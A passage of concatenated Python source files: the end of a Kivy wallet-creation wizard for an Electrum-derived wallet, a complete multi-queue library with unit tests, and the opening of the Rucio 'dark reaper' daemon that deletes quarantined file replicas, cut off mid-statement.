size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__(**kwargs)
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_seci.mnemonic import Mnemonic
from electrum_seci.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and last_word
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
text = unicode(ti.text).strip()
text = ' '.join(text.split())
return text
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return unicode(ti.text).strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste())
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
mqueue.py
|
"""MQueue is a queueing primitive that provides composing new queues
from selecting ("choose") and mapping ("map") other queues.
For base use you create instances of MQueue that you can put and take
elements to and from. If you need to read from multiple MQueues, you
can use "select" to do that directly, but "choose" if you want to
construct a new MQueueBase that is takeable when any of its source
queues has data available.
MQueues are unbounded in their size and sending to and taking from a
queue is non-blocking. The blocking way to read from a queue is to use
the top-level "take" method.
Copyright 2020 Erkki Seppälä <flux@inside.org>
License: MIT
"""
from typing import Callable, Deque, Dict, Generic, List, NewType, Optional, Tuple, TypeVar, Union, Sequence, overload
from collections import deque
from threading import Lock, Condition, Thread
from abc import ABC, abstractclassmethod
import time
import unittest
from roamtoothd.idgen import IdGen
T = TypeVar('T') # pylint: disable=invalid-name
U = TypeVar('U') # pylint: disable=invalid-name
V = TypeVar('V') # pylint: disable=invalid-name
QueueId = NewType('QueueId', int)
Callback = Callable[[Optional[Exception]], None]
CallbackId = NewType('CallbackId', int)
class NoInputs(Exception):
"""You provided an empty list of MQueues to select"""
callback_id_gen: IdGen[CallbackId] = IdGen(CallbackId)
class ValueWrapper(Generic[T]):
"""Wrap values inside a class; used to overcome mypy type checking woes.
We cannot use type variables for isinstance checks, but we can use ValueWrapper."""
def __init__(self, value: T):
self.value = value
class MQueueBase(ABC, Generic[T]):
"""Base class for MQueue."""
@abstractclassmethod
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Either take (remove from queue) a value from the queue, or if the queue is empty, install the
callback. In that case the CallbackId for removal is returned.
This operation is done with the lock held, but the lock is not held when calling the
callback."""
def take_or_add_callback(self, callback: Callback) -> \
Union[CallbackId, ValueWrapper[T]]:
"""A version of take_mapped_or_add_callback that doesn't use a mappign function."""
return self.take_mapped_or_add_callback(callback, lambda x: x)
@abstractclassmethod
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove a callback by its id. If the callback is not installed, this is a no-op."""
@abstractclassmethod
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Non-blocking take that performs mapping holding the internal lock.
This allows for consistent behavior should the mapping function throw;
in that case the value is not removed from the Queue and remains to be
collected by a source that doesn't fail reading it."""
def take_nonblock(self) -> Optional[T]:
"""Non-blocking take"""
return self.take_mapped(lambda x: x)
def map(self, mapping: Callable[[T], U]) -> "MQueueMapped[T, U]":
"""Returna new MQueueMapped that behaves as this one, but has its values mapped with the given
mapping function."""
return MQueueMapped(self, mapping)
class MQueue(MQueueBase[T]):
"""MQueue is a multi-selectable Queue
In other words, you can wait for any one of multiple MQueue
objects to be readable."""
_queue_id_gen: IdGen[QueueId] = IdGen(QueueId)
def __init__(self) -> None:
# used for ordering locking to eliminate deadlocks
self.queue_id = MQueue._queue_id_gen.make()
self._messages: Deque[T] = deque()
self._lock = Lock()
#self._new_data = Condition(self._lock)
self._callbacks: Dict[CallbackId, Callback] = {}
def put(self, value: T) -> None:
"""Puts in a new value to this queue. Non-blocking."""
callbacks: List[Callback] = []
with self._lock:
self._messages.append(value)
callbacks = [cb[1] for cb in self._callbacks.items()]
self._callbacks = {}
#self._new_data.notify_all()
for callback in callbacks:
callback(None)
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Take a value mapped with the given mapping function.
If there is no value in the queue, return None.
Mapping is performed with the MQueue lock held."""
with self._lock:
if self._messages:
value = self._messages.popleft()
try:
ret_value = mapping(value)
except:
self._messages.appendleft(value)
raise
return ret_value
else:
return None
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Returns the value is one is available, in which case no callback is installed.
Otherwise installs the callback and returns its id.
"""
# watch out for tricky flow..
with self._lock:
if self._messages:
value = self._messages.popleft()
try:
return ValueWrapper(mapping(value))
except:
self._messages.appendleft(value)
raise
else:
callback_id = callback_id_gen.make()
self._callbacks[callback_id] = callback
return callback_id
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove a callback by its id."""
with self._lock:
if callback_id in self._callbacks:
del self._callbacks[callback_id]
class MQueueMapped(MQueueBase[U], Generic[T, U]):
"""Given an MQueueBase[T] and a mapping function from T to U, perform mapping if its values to U."""
def __init__(self, parent: MQueueBase[T], mapping: Callable[[T], U]) -> None:
self.parent = parent
self.mapping = mapping
def take_mapped(self, mapping: Callable[[U], V]) -> Optional[V]:
"""Take a mapped value.
Of course, the mapping is done in top of the mapping performed by the object itself.
"""
return self.parent.take_mapped(lambda x: mapping(self.mapping(x)))
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[U], V]) -> \
Union[CallbackId, ValueWrapper[V]]:
"""Returns a value or installs a callback."""
return self.parent.take_mapped_or_add_callback(callback, lambda x: mapping(self.mapping(x)))
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove given callback."""
return self.parent.remove_callback(callback_id)
class MQueueSelect(MQueueBase[T]):
"""Given multiple MQueueBases, activate as soon as one of them becomes active."""
def __init__(self, queues: Sequence[MQueueBase[T]]) -> None:
self.queues = queues
self._callbacks: Dict[CallbackId, Dict[int, Tuple[MQueueBase[T], CallbackId]]] = {}
def take_mapped(self, mapping: Callable[[T], U]) -> Optional[U]:
"""Takes a mapped value from the queues (or None if none available)"""
for queue in self.queues:
value = queue.take_mapped(mapping)
if value is not None:
return value
return None
def take_mapped_or_add_callback(self, callback: Callback, mapping: Callable[[T], U]) -> \
Union[CallbackId, ValueWrapper[U]]:
"""Take a mapped value from the queues or installs callbacks."""
callback_id = callback_id_gen.make()
def wrapped_callback(incoming_exception: Optional[Exception]) -> None:
self.remove_callback(callback_id)
try:
callback(incoming_exception)
except Exception as exn: # pylint: disable=broad-except
callback(exn)
callback_ids: Dict[int, Tuple[MQueueBase[T], CallbackId]] = {}
def cancel_callbacks() -> None:
for _, callback_info in callback_ids.items():
callback_info[0].remove_callback(callback_info[1])
queue_index = 0
for queue in self.queues:
try:
value = queue.take_mapped_or_add_callback(wrapped_callback, mapping)
if isinstance(value, ValueWrapper):
cancel_callbacks()
return value
else:
callback_ids[queue_index] = (queue, value)
queue_index += 1
except:
cancel_callbacks()
raise
callback_id = callback_id_gen.make()
self._callbacks[callback_id] = callback_ids
return callback_id
def remove_callback(self, callback_id: CallbackId) -> None:
"""Remove callback by its id."""
if callback_id in self._callbacks:
callbacks = self._callbacks[callback_id]
del self._callbacks[callback_id]
for _, callback_info in callbacks.items():
callback_info[0].remove_callback(callback_info[1])
@overload
def take(queue: MQueueBase[T]) -> T: # pylint: disable=missing-function-docstring
...
@overload
def take(queue: MQueueBase[T], timeout: Optional[float]) -> Optional[T]: # pylint: disable=missing-function-docstring
...
def take(queue: MQueueBase[T], timeout: Optional[float] = None) -> Optional[T]:
"""Given a queue, take a value from, possibly limited by the given timeout.
If timeout expires the function returns None."""
deadline = time.monotonic() + timeout if timeout is not None else None
def timer_expired() -> bool:
return deadline is not None and time.monotonic() >= deadline
result_available = Condition()
got_result: List[Optional[T]] = [None]
got_exception: List[Optional[Exception]] = [None]
local_result: Optional[ValueWrapper[T]] = None
local_exception: Optional[Exception] = None
while local_result is None and local_exception is None and not timer_expired():
def callback(exception: Optional[Exception]) -> None:
with result_available:
if exception is not None:
got_exception[0] = exception
else:
try:
got_result[0] = queue.take_nonblock()
except Exception as exn: # pylint: disable=broad-except
got_exception[0] = exn
result_available.notify()
take_result = queue.take_or_add_callback(callback)
if isinstance(take_result, ValueWrapper):
local_result = take_result
with result_available:
while local_result is None and local_exception is None and not timer_expired(): # type: ignore
if deadline is None:
result_available.wait()
else:
time_left = deadline - time.monotonic()
if time_left > 0:
result_available.wait(time_left)
if got_exception is not None:
local_exception = got_exception[0]
if got_result[0] is not None:
local_result = ValueWrapper(got_result[0])
if isinstance(take_result, int):
queue.remove_callback(take_result)
if local_exception is not None:
raise local_exception # pylint: disable=raising-bad-type
else:
return local_result.value if local_result else None
def choose(queues: Sequence[MQueueBase[T]]) -> MQueueSelect[T]:
"""Note: if queues is empty, this will never activate."""
return MQueueSelect(queues)
@overload
def select(queues: Sequence[MQueueBase[T]]) -> T: # pylint: disable=missing-function-docstring
...
@overload
def select(queues: Sequence[MQueueBase[T]], timeout: Optional[float]) -> Optional[T]: # pylint: disable=missing-function-docstring
...
def select(queues: Sequence[MQueueBase[T]], timeout: Optional[float] = None) -> Optional[T]:
"""Given a sequence of MQueues, return the first value it finds from them, within the optional
timeout.
If the timeout expires, returns None.
Basically chains take and choose together.
If the queues list is empty, raises NoInputs.
"""
if not queues:
raise NoInputs
return take(choose(queues), timeout)
class TestExn(Exception):
"""Test exception used in tests"""
class TestMQueueu(unittest.TestCase):
"""MQueue tests"""
def test_empty(self) -> None:
"""Test taking from an empty queue."""
queue: MQueue[int] = MQueue()
self.assertEqual(queue.take_nonblock(), None)
def test_simple(self) -> None:
"""Test taking a value from a queue with one value."""
queue: MQueue[int] = MQueue()
queue.put(42)
self.assertEqual(queue.take_nonblock(), 42)
def test_callback(self) -> None:
"""Test invoking a callback then taking a value frmo a queue."""
queue: MQueue[int] = MQueue()
callback_called = [0]
def callback(_: Optional[Exception]) -> None:
callback_called[0] += 1
callback_id = queue.take_or_add_callback(callback)
self.assertIsNotNone(callback_id)
queue.put(42)
self.assertEqual(queue.take_nonblock(), 42)
self.assertEqual(callback_called[0], 1)
def test_select_0(self) -> None:
"""Tests that selecting from no queues results in an exception."""
with self.assertRaises(NoInputs):
select([], timeout=None)
def test_select_timeout_1(self) -> None:
"""Tests that timeout works when queue receives no data."""
queue: MQueue[int] = MQueue()
value = select([queue], timeout=0.1)
self.assertEqual(value, None)
self.assertEqual(queue._callbacks, {}) # pylint: disable=protected-access
def test_select_timeout_2(self) -> None:
"""Tests that timeout works when the two queues receive no data."""
queue1: MQueue[int] = MQueue()
queue2: MQueue[int] = MQueue()
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, None)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_select_1(self) -> None:
"""Test that select works with a queue with one value."""
queue: MQueue[int] = MQueue()
queue.put(42)
value = select([queue], timeout=None)
self.assertEqual(value, 42)
self.assertEqual(queue._callbacks, {}) # pylint: disable=protected-access
def test_select_2(self) -> None:
"""Test that select works with two queues, each with one value."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
queue2: MQueue[int] = MQueue()
queue2.put(2)
value1 = select([queue1, queue2], timeout=None)
self.assertTrue(value1 in [1, 2])
value2 = select([queue1, queue2], timeout=None)
self.assertTrue(value2 in [1, 2] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_select_live(self) -> None:
"""Test that select works with one value, when the value is put in in an another thread."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
thread_handle = Thread(target=thread)
thread_handle.start()
value = select([queue1], timeout=0.2)
self.assertEqual(value, 1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live2(self) -> None:
"""Tests that select works with two values, values put into separate queues in another thread. """
queue1: MQueue[int] = MQueue()
queue2: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
time.sleep(0.05)
queue2.put(2)
thread_handle = Thread(target=thread)
thread_handle.start()
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, 1)
value = select([queue1, queue2], timeout=0.1)
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_map(self) -> None:
"""Test that map works with take_nonblock."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
qm1 = queue1.map(lambda x: x + 1)
value = qm1.take_nonblock()
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_map_select_1(self) -> None:
"""Test that map works with select."""
queue1: MQueue[int] = MQueue()
queue1.put(1)
value = select([queue1.map(lambda x: x + 1)])
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_map_select_2(self) -> None:
"""Test that map works with select, with two queues."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
queue2: MQueue[int] = MQueue()
queue2.put(10)
value1 = select([queue1.map(lambda x: x + 1),
queue2.map(lambda x: x + 1)])
self.assertTrue(value1 in [1, 11])
value2 = select([queue1.map(lambda x: x + 1),
queue2.map(lambda x: x + 1)])
self.assertTrue(value2 in [1, 11] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
self.assertEqual(queue2._callbacks, {}) # pylint: disable=protected-access
def test_map_select_raise_1(self) -> None:
"""Test that map works with select and a risen exception."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
with self.assertRaises(TestExn):
def failer(i: int) -> int:
raise TestExn()
select([queue1.map(failer)])
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live_raise(self) -> None:
"""Test that map works with select and a risen exception when the value is put in in an another thread."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
thread_handle = Thread(target=thread)
thread_handle.start()
with self.assertRaises(TestExn):
def failer(i: int) -> int:
raise TestExn()
select([queue1.map(failer)])
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_live_raise2(self) -> None:
"""Test that reading values from a queue works even if the mapping function throw an exception once."""
queue1: MQueue[int] = MQueue()
def thread() -> None:
time.sleep(0.05)
queue1.put(1)
queue1.put(2)
thread_handle = Thread(target=thread)
thread_handle.start()
count = [0]
def failer(i: int) -> int:
count[0] += 1
if count[0] == 1:
raise TestExn()
else:
return i
source = [queue1.map(failer)]
with self.assertRaises(TestExn):
value = select(source)
value = select(source)
self.assertEqual(value, 1)
value = select(source)
self.assertEqual(value, 2)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_deep1(self) -> None:
"""Test that choose inside a choose works."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
value = take(choose([choose([queue1.map(lambda x: x + 1)])]))
self.assertEqual(value, 1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
def test_select_deep2(self) -> None:
"""Test that choose inside a choose works, when different levels are used."""
queue1: MQueue[int] = MQueue()
queue1.put(0)
queue2: MQueue[int] = MQueue()
queue2.put(10)
source = choose([choose([queue1.map(lambda x: x + 1)]),
queue2.map(lambda x: x + 1)])
value1 = take(source)
self.assertTrue(value1 in [1, 11])
value2 = take(source)
self.assertTrue(value2 in [1, 11] and value2 != value1)
self.assertEqual(queue1._callbacks, {}) # pylint: disable=protected-access
if __name__ == '__main__':
unittest.main()
|
dark_reaper.py
|
# Copyright 2016-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016
# - Thomas Beermann <thomas.beermann@cern.ch>, 2016-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2020
# - Brandon White <bjwhite@fnal.gov>, 2019-2020-2020
#
# PY3K COMPATIBLE
'''
Dark Reaper is a daemon to manage quarantined file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
from rucio.common.config import config_get
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable)
from rucio.core import rse as rse_core
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.quarantined_replica import (list_quarantined_replicas,
delete_quarantined_replicas,
list_rses)
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
GRACEFUL_STOP = threading.Event()
def reaper(rses=[], worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
"""
logging.info('Starting Dark Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, str(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256(sys.argv[0] + ''.join(rses)).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Dark Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals()))
nothing_to_do = True
random.shuffle(rses)
for rse_id in rses:
rse = rse_core.get_rse_name(rse_id=rse_id)
rse_info = rsemgr.get_rse_info(rse)
replicas = list_quarantined_replicas(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse_protocol = rse_core.get_rse_protocols(rse_id=rse_id)
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
scope = ''
if replica['scope']:
scope = replica['scope'].external
try:
pfn = str(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': scope, 'name': replica['name'], 'path': replica['path']}],
